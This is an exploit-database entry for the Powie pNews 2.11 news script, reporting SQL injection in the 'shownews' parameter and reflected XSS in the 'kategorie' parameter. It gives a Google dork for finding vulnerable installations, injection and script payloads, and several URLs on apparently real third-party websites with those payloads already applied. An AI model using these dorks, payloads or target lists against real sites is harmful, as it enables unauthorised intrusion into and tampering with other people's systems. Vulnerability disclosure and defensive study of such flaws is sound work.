id: 18849
date: 06/27/2012
title: Powie pNews 2.11 - (SQL Injection / XSS) Remote Vulnerabilities
author: GoLd_M
cves: 

# Exploit Title: Powie pNews 2.11 - (SQL Injection / XSS) Remote Vulnerabilities
# Date: 26/6/2012
# Author: GoLd_M
# Vendor or Software Link: http://powie.de/ 
# Version: 2.11
# Category:: (SQL Injection / XSS)
# Google dork: intext:"-- pNews 2.11 © Thomas Ehrhardt, 2000-2011 --"
# Tested on: Xp SP 2
# Demo site: 
# Ex : 	/index.php?shownews=1 [SQL] 
# Ex : 	/archiv.php?kategorie="><script>alert(1337);</script> [XSS]
# Demo : http://www.fc-deetz.de/pnews/index.php?shownews=38%27
# Demo : http://www.fc-deetz.de/pnews/index.php?shownews=38%27
http://www.fc-deetz.de/pnews/archiv.php?kategorie="><script>alert(1337);</script>
http://www.g33k.de/pnews/index.php?shownews=151%27
http://www.g33k.de/pnews//archiv.php?kategorie="><script>alert(1337);</script>
http://www.sf-lieme.de/pnews/index.php?shownews=1319%27
http://www.sf-lieme.de/pnews//archiv.php?kategorie="><script>alert(1337);</script>



#  0day.today [2023-03-23]  #